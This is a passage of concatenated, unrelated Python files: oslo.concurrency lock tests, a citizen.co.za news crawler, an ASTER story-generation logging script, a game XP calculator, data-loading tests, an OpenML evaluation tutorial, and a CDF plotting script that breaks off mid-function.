msvcrt.locking(handle.fileno(), msvcrt.LK_NBLCK, 1) else: fcntl.flock(handle, fcntl.LOCK_EX | fcntl.LOCK_NB) def unlock_file(handle): if sys.platform == 'win32': msvcrt.locking(handle.fileno(), msvcrt.LK_UNLCK, 1) else: fcntl.flock(handle, fcntl.LOCK_UN) def lock_files(handles_dir, out_queue): with lockutils.lock('external', 'test-', external=True): # Open some files we can use for locking handles = [] for n in range(50): path = os.path.join(handles_dir, ('file-%s' % n)) handles.append(open(path, 'w')) # Loop over all the handles and try locking the file # without blocking, keep a count of how many files we # were able to lock and then unlock. If the lock fails # we get an IOError and bail out with bad exit code count = 0 for handle in handles: try: lock_file(handle) count += 1 unlock_file(handle) except IOError: os._exit(2) finally: handle.close() return out_queue.put(count) class LockTestCase(test_base.BaseTestCase): def setUp(self): super(LockTestCase, self).setUp() self.config = self.useFixture(config.Config(lockutils.CONF)).config def test_synchronized_wrapped_function_metadata(self): @lockutils.synchronized('whatever', 'test-') def foo(): """Bar.""" pass self.assertEqual('Bar.', foo.__doc__, "Wrapped function's docstring " "got lost") self.assertEqual('foo', foo.__name__, "Wrapped function's name " "got mangled") def test_lock_internally_different_collections(self): s1 = lockutils.Semaphores() s2 = lockutils.Semaphores() trigger = threading.Event() who_ran = collections.deque() def f(name, semaphores, pull_trigger): with lockutils.internal_lock('testing', semaphores=semaphores): if pull_trigger: trigger.set() else: trigger.wait() who_ran.append(name) threads = [ threading.Thread(target=f, args=(1, s1, True)), threading.Thread(target=f, args=(2, s2, False)), ] for thread in threads: thread.start() for thread in threads: thread.join() self.assertEqual([1, 2], sorted(who_ran)) def test_lock_internally(self): """We can lock across multiple threads.""" saved_sem_num = len(lockutils._semaphores) seen_threads = list() def f(_id): with lockutils.lock('testlock2', 'test-', external=False): for x in range(10): seen_threads.append(_id) threads = [] for i in range(10): thread = threading.Thread(target=f, args=(i,)) threads.append(thread) thread.start() for thread in threads: thread.join() self.assertEqual(100, len(seen_threads)) # Looking at the seen threads, split it into chunks of 10, and verify # that the last 9 match the first in each chunk. 
for i in range(10): for j in range(9): self.assertEqual(seen_threads[i * 10], seen_threads[i * 10 + 1 + j]) self.assertEqual(saved_sem_num, len(lockutils._semaphores), "Semaphore leak detected") def test_lock_internal_fair(self): """Check that we're actually fair.""" def f(_id): with lockutils.lock('testlock', 'test-', external=False, fair=True): lock_holder.append(_id) lock_holder = [] threads = [] # While holding the fair lock, spawn a bunch of threads that all try # to acquire the lock. They will all block. Then release the lock # and see what happens. with lockutils.lock('testlock', 'test-', external=False, fair=True): for i in range(10): thread = threading.Thread(target=f, args=(i,)) threads.append(thread) thread.start() # Allow some time for the new thread to get queued onto the # list of pending writers before continuing. This is gross # but there's no way around it without using knowledge of # fasteners internals. time.sleep(0.5) # Wait for all threads. for thread in threads: thread.join() self.assertEqual(10, len(lock_holder)) # Check that the threads each got the lock in fair order. for i in range(10): self.assertEqual(i, lock_holder[i]) def test_fair_lock_with_semaphore(self): def do_test(): s = lockutils.Semaphores() with lockutils.lock('testlock', 'test-', semaphores=s, fair=True): pass self.assertRaises(NotImplementedError, do_test) def test_nested_synchronized_external_works(self): """We can nest external syncs.""" tempdir = tempfile.mkdtemp() try: self.config(lock_path=tempdir, group='oslo_concurrency') sentinel = object() @lockutils.synchronized('testlock1', 'test-', external=True) def outer_lock(): @lockutils.synchronized('testlock2', 'test-', external=True) def inner_lock(): return sentinel return inner_lock() self.assertEqual(sentinel, outer_lock()) finally: if os.path.exists(tempdir): shutil.rmtree(tempdir) def _do_test_lock_externally(self): """We can lock across multiple processes.""" handles_dir = tempfile.mkdtemp() try: children = [] for n in range(50): queue = multiprocessing.Queue() proc = multiprocessing.Process( target=lock_files, args=(handles_dir, queue)) proc.start() children.append((proc, queue)) for child, queue in children: child.join() count = queue.get(block=False) self.assertEqual(50, count) finally: if os.path.exists(handles_dir): shutil.rmtree(handles_dir, ignore_errors=True) def test_lock_externally(self): lock_dir = tempfile.mkdtemp() self.config(lock_path=lock_dir, group='oslo_concurrency') try: self._do_test_lock_externally() finally: if os.path.exists(lock_dir): shutil.rmtree(lock_dir, ignore_errors=True) def test_lock_externally_lock_dir_not_exist(self): lock_dir = tempfile.mkdtemp() os.rmdir(lock_dir) self.config(lock_path=lock_dir, group='oslo_concurrency') try: self._do_test_lock_externally() finally: if os.path.exists(lock_dir): shutil.rmtree(lock_dir, ignore_errors=True) def test_synchronized_with_prefix(self): lock_name = 'mylock' lock_pfix = 'mypfix-' foo = lockutils.synchronized_with_prefix(lock_pfix) @foo(lock_name, external=True) def bar(dirpath, pfix, name): return True lock_dir = tempfile.mkdtemp() self.config(lock_path=lock_dir, group='oslo_concurrency') self.assertTrue(bar(lock_dir, lock_pfix, lock_name)) def test_synchronized_without_prefix(self): lock_dir = tempfile.mkdtemp() self.config(lock_path=lock_dir, group='oslo_concurrency') @lockutils.synchronized('lock', external=True) def test_without_prefix(): # We can't check much pass try: test_without_prefix() finally: if os.path.exists(lock_dir): shutil.rmtree(lock_dir, 
ignore_errors=True) def test_synchronized_prefix_without_hypen(self): lock_dir = tempfile.mkdtemp() self.config(lock_path=lock_dir, group='oslo_concurrency') @lockutils.synchronized('lock', 'hypen', True) def test_without_hypen(): # We can't check much pass try: test_without_hypen() finally: if os.path.exists(lock_dir): shutil.rmtree(lock_dir, ignore_errors=True) def test_contextlock(self): lock_dir = tempfile.mkdtemp() self.config(lock_path=lock_dir, group='oslo_concurrency') try: # Note(flaper87): Lock is not external, which means # a semaphore will be yielded with lockutils.lock("test") as sem: if six.PY2: self.assertIsInstance(sem, threading._Semaphore) else: self.assertIsInstance(sem, threading.Semaphore) # NOTE(flaper87): Lock is external so an InterProcessLock # will be yielded. with lockutils.lock("test2", external=True) as lock: self.assertTrue(lock.exists()) with lockutils.lock("test1", external=True) as lock1: self.assertIsInstance(lock1, lockutils.InterProcessLock) finally: if os.path.exists(lock_dir): shutil.rmtree(lock_dir, ignore_errors=True) def test_contextlock_unlocks(self): lock_dir = tempfile.mkdtemp() self.config(lock_path=lock_dir, group='oslo_concurrency') sem = None try: with lockutils.lock("test") as sem: if six.PY2: self.assertIsInstance(sem, threading._Semaphore) else: self.assertIsInstance(sem, threading.Semaphore) with lockutils.lock("test2", external=True) as lock: self.assertTrue(lock.exists()) # NOTE(flaper87): Lock should be free with lockutils.lock("test2", external=True) as lock: self.assertTrue(lock.exists()) # NOTE(flaper87): Lock should be free # but semaphore should already exist. with lockutils.lock("test") as sem2: self.assertEqual(sem, sem2) finally: if os.path.exists(lock_dir): shutil.rmtree(lock_dir, ignore_errors=True) def _test_remove_lock_external_file(self, lock_dir, use_external=False): lock_name = 'mylock' lock_pfix = 'mypfix-remove-lock-test-' if use_external: lock_path = lock_dir else: lock_path = None lockutils.remove_external_lock_file(lock_name, lock_pfix, lock_path) for ent in os.listdir(lock_dir): self.assertRaises(OSError, ent.startswith, lock_pfix) if os.path.exists(lock_dir): shutil.rmtree(lock_dir, ignore_errors=True) def test_remove_lock_external_file(self): lock_dir = tempfile.mkdtemp() self.config(lock_path=lock_dir, group='oslo_concurrency') self._test_remove_lock_external_file(lock_dir) def test_remove_lock_external_file_lock_path(self): lock_dir = tempfile.mkdtemp() self._test_remove_lock_external_file(lock_dir, use_external=True) def test_no_slash_in_b64(self): # base64(sha1(foobar)) has a slash in it with lockutils.lock("foobar"): pass def test_deprecated_names(self): paths = self.create_tempfiles([['fake.conf', '\n'.join([ '[DEFAULT]', 'lock_path=foo', 'disable_process_locking=True']) ]]) conf = cfg.ConfigOpts() conf(['--config-file', paths[0]]) conf.register_opts(lockutils._opts, 'oslo_concurrency') self.assertEqual('foo', conf.oslo_concurrency.lock_path) self.assertTrue(conf.oslo_concurrency.disable_process_locking) class FileBasedLockingTestCase(test_base.BaseTestCase): def setUp(self): super(FileBasedLockingTestCase, self).setUp() self.lock_dir = tempfile.mkdtemp() def test_lock_file_exists(self): lock_file = os.path.join(self.lock_dir, 'lock-file') @lockutils.synchronized('lock-file', external=True, lock_path=self.lock_dir) def foo(): self.assertTrue(os.path.exists(lock_file)) foo() def test_interprocess_lock(self): lock_file = os.path.join(self.lock_dir, 'processlock') pid = os.fork() if pid: # Make sure the child 
grabs the lock first start = time.time() while not os.path.exists(lock_file): if time.time() - start > 5: self.fail('Timed out waiting for child to grab lock') time.sleep(0) lock1 = lockutils.InterProcessLock('foo') lock1.lockfile = open(lock_file, 'w') # NOTE(bnemec): There is a brief window between when the lock file # is created and when it actually becomes locked. If we happen to # context switch in that window we may succeed in locking the # file. Keep retrying until we either get the expected exception # or timeout waiting. while time.time() - start < 5: try: lock1.trylock() lock1.unlock() time.sleep(0) except IOError: # This is what we expect to happen break else: self.fail('Never caught expected lock exception') # We don't need to wait for the full sleep in the child here os.kill(pid, signal.SIGKILL) else: try: lock2 = lockutils.InterProcessLock('foo') lock2.lockfile = open(lock_file, 'w') have_lock = False while not have_lock: try: lock2.trylock() have_lock = True except IOError: pass finally: # NOTE(bnemec): This is racy, but I don't want to add any # synchronization primitives that might mask a problem # with the one we're trying to test here. time.sleep(.5) os._exit(0) def test_interthread_external_lock(self): call_list = [] @lockutils.synchronized('foo', external=True, lock_path=self.lock_dir) def foo(param): """Simulate a long-running threaded operation.""" call_list.append(param) # NOTE(bnemec): This is racy, but I don't want to add any # synchronization primitives that might mask a problem # with the one we're trying to test here. time.sleep(.5) call_list.append(param) def other(param): foo(param) thread = threading.Thread(target=other, args=('other',)) thread.start() # Make sure the other thread grabs the lock # NOTE(bnemec): File locks do not actually work between threads, so # this test is verifying that the local semaphore is still enforcing # external locks in that case. This means this test does not have # the same race problem as the process test above because when the # file is created the semaphore has already been grabbed. 
start = time.time() while not os.path.exists(os.path.join(self.lock_dir, 'foo')): if time.time() - start > 5: self.fail('Timed out waiting for thread to grab lock') time.sleep(0) thread1 = threading.Thread(target=other, args=('main',)) thread1.start() thread1.join() thread.join() self.assertEqual(['other', 'other', 'main', 'main'], call_list) def test_non_destructive(self): lock_file = os.path.join(self.lock_dir, 'not-destroyed') with open(lock_file, 'w') as f: f.write('test') with lockutils.lock('not-destroyed', external=True, lock_path=self.lock_dir): with open(lock_file) as f: self.assertEqual('test', f.read()) class LockutilsModuleTestCase(test_base.BaseTestCase): def setUp(self): super(LockutilsModuleTestCase, self).setUp() self.old_env = os.environ.get('OSLO_LOCK_PATH') if self.old_env is not None: del os.environ['OSLO_LOCK_PATH'] def tearDown(self): if self.old_env is not None: os.environ['OSLO_LOCK_PATH'] = self.old_env super(LockutilsModuleTestCase, self).tearDown() def test_main(self): script = '\n'.join([ 'import os', 'lock_path = os.environ.get("OSLO_LOCK_PATH")', 'assert lock_path is not None', 'assert os.path.isdir(lock_path)', ]) argv = ['', sys.executable, '-c', script] retval = lockutils._lock_wrapper(argv) self.assertEqual(0, retval, "Bad OSLO_LOCK_PATH has been set") def test_return_value_maintained(self): script = '\n'.join([ 'import sys', 'sys.exit(1)', ]) argv = ['', sys.executable, '-c', script] retval = lockutils._lock_wrapper(argv) self.assertEqual(1, retval) def test_direct_call_explodes(self): cmd = [sys.executable, '-m', 'oslo_concurrency.lockutils'] with open(os.devnull, 'w') as devnull: retval = subprocess.call(cmd, stderr=devnull) self.assertEqual(1, retval) class TestLockFixture(test_base.BaseTestCase): def setUp(self): super(TestLockFixture, self).setUp() self.config = self.useFixture(config.Config(lockutils.CONF)).config self.tempdir = tempfile.mkdtemp() def _check_in_lock(self): self.assertTrue(self.lock.exists()) def tearDown(self): self._check_in_lock() super(TestLockFixture, self).tearDown() def test_lock_fixture(self): # Setup lock fixture to test that teardown is inside the lock self.config(lock_path=self.tempdir, group='oslo_concurrency') fixture = fixtures.LockFixture('test-lock') self.useFixture(fixture) self.lock = fixture.lock class TestGetLockPath(test_base.BaseTestCase): def setUp(self): super(TestGetLockPath, self).setUp() self.conf = self.useFixture(config.Config(lockutils.CONF)).conf def test_get_default(self): lockutils.set_defaults(lock_path='/the/path') self.assertEqual('/the/path', lockutils.get_lock_path(self.conf)) def test_get_override(self): lockutils._register_opts(self.conf) self.conf.set_override('lock_path', '/alternate/path', group='oslo_concurrency') self.assertEqual('/alternate/path', lockutils.get_lock_path(self.conf))
python
from urlparse import urlparse, urlunparse
import re

from bs4 import BeautifulSoup

from .base import BaseCrawler
from ...models import Author, AuthorType


class CitizenCrawler(BaseCrawler):
    TL_RE = re.compile(r'(www\.)?citizen\.co\.za')

    def offer(self, url):
        """ Can this crawler process this URL? """
        parts = urlparse(url)
        return bool(self.TL_RE.match(parts.netloc))

    def canonicalise_url(self, url):
        """ Strip anchors, etc. """
        url = super(CitizenCrawler, self).canonicalise_url(url)
        parts = urlparse(url)

        # force http, strip www, enforce trailing slash
        path = parts.path
        if not path.endswith('/'):
            path = path + '/'

        return urlunparse(['http', 'citizen.co.za', path, parts.params, None, None])

    def extract(self, doc, raw_html):
        """ Extract text and other things from the raw_html for this document. """
        super(CitizenCrawler, self).extract(doc, raw_html)

        soup = BeautifulSoup(raw_html)

        doc.title = self.extract_plaintext(soup.select(".post h1"))
        doc.summary = self.extract_plaintext(soup.select(".post .single-excerpt"))
        doc.text = doc.summary + "\n\n" + "\n\n".join(p.text for p in soup.select(".post .single-content > p"))
        doc.published_at = self.parse_timestamp(
            self.extract_plaintext(soup.select(".post .single-date")))

        author = self.extract_plaintext(soup.select(".post .single-byline"))
        if author:
            doc.author = Author.get_or_create(author, AuthorType.journalist())
        else:
            doc.author = Author.unknown()
python
import sys sys.path.insert(1, "../") import pickle from story_environment_neuro import * from decode_redo_pipeline_top_p_multi import Decoder import numpy as np from data_utils import * import argparse from memoryGraph_scifi2 import MemoryGraph import datetime from semantic_fillIn_class_offloaded_vn34 import FillIn from aster_utils import * from BERT_fill_class import * models = DataHolder(model_name="scifi") parser = argparse.ArgumentParser() parser.add_argument( "--config", help="path to json config", required=True ) args = parser.parse_args() config_filepath = args.config config = read_config(config_filepath) env = storyEnv(config['data']['verbose']) h = None c = None word2id, id2word = read_vocab(config['data']['vocab_file']) seq2seq_model = Decoder(config_path=config_filepath, top_n=config['data']['top_n']) src_data = read_bucket_data(word2id, id2word, src = config['data']['test_src'], config = None ) seeds = [x.split("|||")[0] for x in open("../data/bucketed_events_test_nameFix.txt", 'r').readlines()] fillObject = FillIn(models, verbose=config['data']['verbose'], remove_transitive=True) #test verbs verbs = ["fill-9.8", "suspect-81", "keep-15.2", "throw-17.1"] ###################################### def cleanBERT(string): while "[UNK]" in string: string = string.replace("[UNK]","") while "# " in string: string = string.replace("# ","#") while " #" in string: string = string.replace(" #","#") while "#" in string: string = string.replace("#","") while " ," in string: string = string.replace(" ,",",") while " ." in string: string = string.replace(" .",".") while " " in string: string = string.replace(" "," ") string = string.strip() return string def read_vocab(file_path): vocab = [word for word in pickle.load(open(file_path, 'rb'))] word2id = {} id2word = {} for ind, word in enumerate(vocab): word2id[word] = ind id2word[ind] = word return word2id, id2word def printPred(pred): x = "" if pred[0] == True: x = "not " print("<fact>"+x+rep(pred[1])+"("+rep(",".join(pred[2:]))+") </fact>") def printState(state): print("<state>") print("<!--Current story world state-->") state_keys = list(state.keys()) state_keys.sort() for entity in state_keys: if state[entity]: print("<entity>") print("<name>"+rep(entity)+"</name>") print("<facts>") for fact in state[entity]: if not type(fact) == str: printPred(fact) else: print("<fact>"+rep(fact)+"</fact>") print("</facts>") print("</entity>") print("</state>") def prepToPrint(event, memory): event = swapLastParams(event) unfilled = rep(str(event)) filled, memory = fillObject.fillEvent(event, memory) return unfilled, filled, memory def getAction(config, env, results, memory, history): if config['model']['causal'] == True: pruned_candidates = env.validate(results, memory, history, models, config['model']['forced_frame']) #print(f"NUM AFTER PRUNED (MAX {config['data']['top_n']}): {len(pruned_candidates)}") print(f"<numValidCandidates> {len(pruned_candidates)} out of {len(results)} possible </numValidCandidates>") if len(pruned_candidates) == 0: print("</step>\n</story>") print("No more candidate events!") env.reset() return None, env action = pruned_candidates[0] #this is a (event, manipulateState object) tuple #TODO: should env come from pruned_candidates? 
next_state = env.step(action) printState(next_state) return action, env else: if config['model']["original_mode"] == True: pruned_candidates = env.onlyFillPronouns(results, memory, history) else: pruned_candidates = env.nonCausal_validate(results, memory, history) if len(pruned_candidates) == 0: print("</step>\n</story>") print("No more candidate events!") env.reset() return None, env print(f"<numValidCandidates> {len(pruned_candidates)} out of {len(results)} possible </numValidCandidates>") action = pruned_candidates[0] return action, env def getSentence(filled_event, event, sentence_memory): #clean before BERT final_event = [] for i, param in enumerate(filled_event): if i != 1 and isVerbNet(event[i]): final_event += ["to",param] elif "EmptyParameter" in param: continue else: final_event += [param] #E2S max_masks = 3 sentence = BERT_fill(sentence_memory, final_event, max_masks) if sentence: sentence = cleanBERT(" ".join(sentence)) sentence = sentence.strip() while " " in sentence: sentence = sentence.replace(" "," ") print("SENTENCE",sentence) return sentence else: return "" ###################################### print('<?xml version="1.0" encoding="UTF-8" ?>') print(f"<!--{datetime.date.today()}-->") print("<!--**Version Information**-->") print(f"<!--CAUSAL: {config['model']['causal']}-->") if config['model']['causal']: print(f"<!--FORCE FIND VERBNET FRAME: {config['model']['forced_frame']}-->") print(f"<!--VERB RESAMPLING (for DRL): {config['model']['forced_frame']}-->") else: print(f"<!--PROPERLY FORMATED EVENTS ONLY: {not config['model']['original_mode']}-->") print("<!--#########################-->") print("<!--**About**-->") print("<!--Log file for ASTER story generator system. Each story has a number of steps. In each step, the system goes through a set of candidate events, determining if each is valid and giving reasons why or why not it is. Out of the valid events, the system selects one.-->") for j, event in enumerate(seeds): env.reset() event = event.split(" ") print("<story>") print("<!--A new story-->") memory = MemoryGraph(models) print("<step id=\""+str(0)+"\">") action, env = getAction(config, env, [event], memory, []) if not action: print("<error> Start event cannot be properly added to state </error>\n</story>") continue if type(action) == tuple: event = action[0] else: event = action print_event, filled_event, memory = prepToPrint(copy.deepcopy(event), memory) print("<startingEvent>\n<!--The user-given event to start the story-->\n"+print_event+ "</startingEvent>") print("<filledEvent>\n<!--An example of the event, randomly filled with real words-->\n"+str(filled_event)+"</filledEvent>") memory.add_event(event) history = [event] print("</step>") print_history = [filled_event] sentence = getSentence(filled_event, event, []) if not sentence: print("<error> Can't turn event "+str(filled_event)+" into a sentence. 
</error>\n</story>") continue sentence_memory = [sentence] #####Generate Events##### for i in range(0,5): #length of story #run through seq2seq/seq2seq2seq to get next distribution of events print("<step id=\""+str(i+1)+"\">") print("<!--Going through candidate events to find the next event in the story-->") results, h, c = seq2seq_model.pipeline_predict([event], h, c, start=True) #find a consistent one action, env = getAction(config, env, results, memory, history) if not action: print("</step>\n<final_story>"+str(print_history)+"</final_story>\n</story>") break if type(action) == tuple: event = action[0] else: event = action memory.add_event(event) history.append(event) print_event, filled_event, memory = prepToPrint(copy.deepcopy(event), memory) print("<selectedEvent>"+print_event+ "</selectedEvent>") print("<filledEvent>\n<!--An example of the event, randomly filled with real words-->\n"+str(filled_event)+"</filledEvent>") print_history.append(filled_event) print("<story_so_far>"+str(print_history)+"</story_so_far>") sentence = getSentence(filled_event, event, sentence_memory) if not sentence: print("<error> Can't turn event "+str(filled_event)+" into a sentence. </error>") break sentence_memory.append(sentence) print("</step>") print("<final_story>"+str(sentence_memory)+"</final_story>") print("</story>")
python
usrLvl = int(input("What level are you right now (1-50)?"))
usrXP = int(input("What is your XP count right now?"))
usrPrs = int(input("What prestige are you right now (0-10)?"))
usr20 = str(input("Are you a Kamado (write \"y\" or \"n\")?"))
usr10 = str(input("Are you a Tokito or Ubuyashiki (write \"y\" or \"n\")?"))
xpMod = int(input("What is the current XP modifier (1 for default)?"))

# Total XP accumulated on reaching each level; level 50 sits at 142058 XP.
# (Level 30 has no entry in the original table.)
xpAtLevel = {
    1: 0, 2: 132, 3: 271, 4: 421, 5: 587, 6: 773, 7: 985, 8: 1228, 9: 1508,
    10: 1831, 11: 2204, 12: 2633, 13: 3125, 14: 3687, 15: 4327, 16: 5051,
    17: 5868, 18: 6785, 19: 7810, 20: 8951, 21: 10216, 22: 11614, 23: 13152,
    24: 14840, 25: 16686, 26: 18700, 27: 20890, 28: 23265, 29: 25834,
    31: 28607, 32: 31593, 33: 34802, 34: 38243, 35: 41926, 36: 50057,
    37: 54525, 38: 59275, 39: 64317, 40: 69661, 41: 75318, 42: 81298,
    43: 87612, 44: 94270, 45: 101283, 46: 108662, 47: 116418, 48: 124562,
    49: 133105, 50: 142058,
}

if usrLvl > 50:
    baseXP = 0
    print("You are already higher than level 50, you don't need any more experience to prestige.")
elif usrLvl < 1:
    raise SystemExit("You entered an impossible level.")
elif usrLvl not in xpAtLevel:
    # Level 30 has no value in the original table, so there is nothing to look up.
    raise SystemExit("No XP entry is available for level " + str(usrLvl) + ".")
else:
    # XP still missing between the player's current level and level 50.
    baseXP = 142058 - xpAtLevel[usrLvl]

if usr20 == "y":
    familyXP = 0.2
elif usr10 == "y":
    familyXP = 0.1
else:
    familyXP = 0.0

# The required XP is the remaining XP divided by the combined multiplier
# (event modifier + family bonus + 0.2 per prestige + the base 1x rate).
rqrXP = (baseXP - usrXP) / (xpMod + familyXP + usrPrs * 0.2 + 1)
displayXP = int(rqrXP)

print("You need " + str(displayXP) + " EXP in order to get to level 50.")
print("You need to do " + str((rqrXP // 21000) + (0 < rqrXP % 21000)) + " (" + str(round((rqrXP / 21000), 2)) + ")" + " infinity castles (assuming you beat all bosses and grip no demons) to get to level 50.")
print("You need to do " + str((rqrXP // 6000) + (0 < rqrXP % 6000)) + " (" + str(round((rqrXP / 6000), 2)) + ")" + " Kaigakus in order to get to level 50.")
print("You need to do " + str((rqrXP // 300) + (0 < rqrXP % 300)) + " (" + str(round((rqrXP / 300), 2)) + ")" + " Zenitsus in order to get to level 50.")
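# A quick worked example of the formula above (hypothetical numbers, not taken
# from the game): a level 25 player (142058 - 16686 = 125372 XP still needed at
# the base rate) with 500 XP banked, prestige 1, no family bonus and the default
# 1x modifier needs (125372 - 500) / (1 + 0.0 + 1 * 0.2 + 1) = 124872 / 2.2
# = 56760.0 XP worth of base-rate play to reach level 50.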
python
import math
import os

import pytest
import torch

from tests import _PATH_DATA


@pytest.mark.skipif(not os.path.exists(_PATH_DATA), reason="Data files not found")
def test_load_traindata():
    dataset = torch.load(f"{_PATH_DATA}/processed/train.pt")
    assert len(dataset) == math.ceil(25000 / 64)


@pytest.mark.skipif(not os.path.exists(_PATH_DATA), reason="Data files not found")
def test_load_testdata():
    dataset = torch.load(f"{_PATH_DATA}/processed/test.pt")
    assert len(dataset) == math.ceil(5000 / 64)
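# The expected lengths above assume the processed files store one entry per
# 64-sample batch rather than one entry per sample (an assumption about how the
# dataset was written, not verified here): math.ceil(25000 / 64) = 391 training
# batches and math.ceil(5000 / 64) = 79 test batches.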
python
""" ==================== Fetching Evaluations ==================== Evalutions contain a concise summary of the results of all runs made. Each evaluation provides information on the dataset used, the flow applied, the setup used, the metric evaluated, and the result obtained on the metric, for each such run made. These collection of results can be used for efficient benchmarking of an algorithm and also allow transparent reuse of results from previous experiments on similar parameters. In this example, we shall do the following: * Retrieve evaluations based on different metrics * Fetch evaluations pertaining to a specific task * Sort the obtained results in descending order of the metric * Plot a cumulative distribution function for the evaluations * Compare the top 10 performing flows based on the evaluation performance * Retrieve evaluations with hyperparameter settings """ ############################################################################ import openml ############################################################################ # Listing evaluations # ******************* # Evaluations can be retrieved from the database in the chosen output format. # Required filters can be applied to retrieve results from runs as required. # We shall retrieve a small set (only 10 entries) to test the listing function for evaluations openml.evaluations.list_evaluations(function='predictive_accuracy', size=10, output_format='dataframe') # Using other evaluation metrics, 'precision' in this case evals = openml.evaluations.list_evaluations(function='precision', size=10, output_format='dataframe') # Querying the returned results for precision above 0.98 print(evals[evals.value > 0.98]) ############################################################################# # Viewing a sample task # ===================== # Over here we shall briefly take a look at the details of the task. # We will start by displaying a simple *supervised classification* task: task_id = 167140 # https://www.openml.org/t/167140 task = openml.tasks.get_task(task_id) print(task) ############################################################################# # Obtaining all the evaluations for the task # ========================================== # We'll now obtain all the evaluations that were uploaded for the task # we displayed previously. # Note that we now filter the evaluations based on another parameter 'task'. metric = 'predictive_accuracy' evals = openml.evaluations.list_evaluations(function=metric, task=[task_id], output_format='dataframe') # Displaying the first 10 rows print(evals.head(n=10)) # Sorting the evaluations in decreasing order of the metric chosen evals = evals.sort_values(by='value', ascending=False) print("\nDisplaying head of sorted dataframe: ") print(evals.head()) ############################################################################# # Obtaining CDF of metric for chosen task # *************************************** # We shall now analyse how the performance of various flows have been on this task, # by seeing the likelihood of the accuracy obtained across all runs. # We shall now plot a cumulative distributive function (CDF) for the accuracies obtained. 
from matplotlib import pyplot as plt def plot_cdf(values, metric='predictive_accuracy'): max_val = max(values) n, bins, patches = plt.hist(values, density=True, histtype='step', cumulative=True, linewidth=3) patches[0].set_xy(patches[0].get_xy()[:-1]) plt.xlim(max(0, min(values) - 0.1), 1) plt.title('CDF') plt.xlabel(metric) plt.ylabel('Likelihood') plt.grid(b=True, which='major', linestyle='-') plt.minorticks_on() plt.grid(b=True, which='minor', linestyle='--') plt.axvline(max_val, linestyle='--', color='gray') plt.text(max_val, 0, "%.3f" % max_val, fontsize=9) plt.show() plot_cdf(evals.value, metric) # This CDF plot shows that for the given task, based on the results of the # runs uploaded, it is almost certain to achieve an accuracy above 52%, i.e., # with non-zero probability. While the maximum accuracy seen till now is 96.5%. ############################################################################# # Comparing top 10 performing flows # ********************************* # Let us now try to see which flows generally performed the best for this task. # For this, we shall compare the top performing flows. import numpy as np import pandas as pd def plot_flow_compare(evaluations, top_n=10, metric='predictive_accuracy'): # Collecting the top 10 performing unique flow_id flow_ids = evaluations.flow_id.unique()[:top_n] df = pd.DataFrame() # Creating a data frame containing only the metric values of the selected flows # assuming evaluations is sorted in decreasing order of metric for i in range(len(flow_ids)): flow_values = evaluations[evaluations.flow_id == flow_ids[i]].value df = pd.concat([df, flow_values], ignore_index=True, axis=1) fig, axs = plt.subplots() df.boxplot() axs.set_title('Boxplot comparing ' + metric + ' for different flows') axs.set_ylabel(metric) axs.set_xlabel('Flow ID') axs.set_xticklabels(flow_ids) axs.grid(which='major', linestyle='-', linewidth='0.5', color='gray', axis='y') axs.minorticks_on() axs.grid(which='minor', linestyle='--', linewidth='0.5', color='gray', axis='y') # Counting the number of entries for each flow in the data frame # which gives the number of runs for each flow flow_freq = list(df.count(axis=0, numeric_only=True)) for i in range(len(flow_ids)): axs.text(i + 1.05, np.nanmin(df.values), str(flow_freq[i]) + '\nrun(s)', fontsize=7) plt.show() plot_flow_compare(evals, metric=metric, top_n=10) # The boxplots below show how the flows perform across multiple runs on the chosen # task. The green horizontal lines represent the median accuracy of all the runs for # that flow (number of runs denoted at the bottom of the boxplots). The higher the # green line, the better the flow is for the task at hand. The ordering of the flows # are in the descending order of the higest accuracy value seen under that flow. 
# Printing the corresponding flow names for the top 10 performing flow IDs top_n = 10 flow_ids = evals.flow_id.unique()[:top_n] flow_names = evals.flow_name.unique()[:top_n] for i in range(top_n): print((flow_ids[i], flow_names[i])) ############################################################################# # Obtaining evaluations with hyperparameter settings # ================================================== # We'll now obtain the evaluations of a task and a flow with the hyperparameters # List evaluations in descending order based on predictive_accuracy with # hyperparameters evals_setups = openml.evaluations.list_evaluations_setups(function='predictive_accuracy', task=[31], size=100, sort_order='desc') "" print(evals_setups.head()) "" # Return evaluations for flow_id in descending order based on predictive_accuracy # with hyperparameters. parameters_in_separate_columns returns parameters in # separate columns evals_setups = openml.evaluations.list_evaluations_setups(function='predictive_accuracy', flow=[6767], size=100, parameters_in_separate_columns=True) "" print(evals_setups.head(10)) ""
python
#!/usr/bin/python import numpy as np import matplotlib.pyplot as plt import matplotlib import argparse def plot_err_cdf(data1, data2): """draw cdf to see the error between without/with freeze""" err_data = [] for x, y in zip(data1, data2): err_data.append(abs(x-y)) sorted_err_data = np.sort(err_data) cdf_err = np.arange(len(sorted_err_data)) / float(len(sorted_err_data)) avg = np.mean(data1) variance = [] for x in data1: variance.append(abs(x-avg)) num_bins = 5000 counts, bin_edges = np.histogram(variance, bins=num_bins) cdf_variance = np.cumsum(counts) / float(len(variance)) xlim_min = min(min(err_data), min(variance)) xlim_max = max(max(err_data), max(variance)) plt.figure() # plt.xlim(0.99 * xlim_min, 1.02 * xlim_max) # plt.xlim(0, 5000) p1 = plt.plot(sorted_err_data, cdf_err, 'b', label=label_err) p2 = plt.plot(bin_edges[1:], cdf_variance, 'r', label='Variance of GTOD') plt.legend() #(loc='lower right') plt.xlabel('Time Error (Milliseconds)', fontsize=20) plt.ylabel('Cumulative Distribution', fontsize=20) plt.grid(True) # plt.show() plt.savefig('err_%s_cdf.eps' % topic_name, format='eps') def plot_compare_cdf(data1, data2): """draw cdf to compare without/with freeze elapsed time""" num_bins = 5000 counts1, bin_edges1 = np.histogram(data1, bins=num_bins) cdf1 = np.cumsum(counts1) / float(len(data1)) counts2, bin_edges2 = np.histogram(data2, bins=num_bins) cdf2 = np.cumsum(counts2) / float(len(data2)) xlim_min = min(min(data1), min(data2)) xlim_max = max(max(data1), max(data2)) plt.figure() # plt.xlim(0.98 * xlim_min, 1.02 * xlim_max) # plt.xlim(65000, 70000) p1 = plt.plot(bin_edges1[1:], cdf1, 'b', label=label1) p2 = plt.plot(bin_edges2[1:], cdf2, 'r', label=label2) plt.legend() #(loc='lower right') plt.xlabel('PING RTT / Milliseconds', fontsize=20) plt.ylabel('Cumulative Distribution', fontsize=20) plt.grid(True) # plt.show() plt.savefig('cmp_%s_cdf.eps' % topic_name, format='eps') def plot_variance_cdf(data): avg = np.mean(data) variance = [] for x in data: variance.append(abs(x-avg)) num_bins = 10 counts, bin_edges = np.histogram(variance, bins=num_bins) cdf = np.cumsum(counts) / float(len(variance)) xlim_min = min(variance) xlim_max = 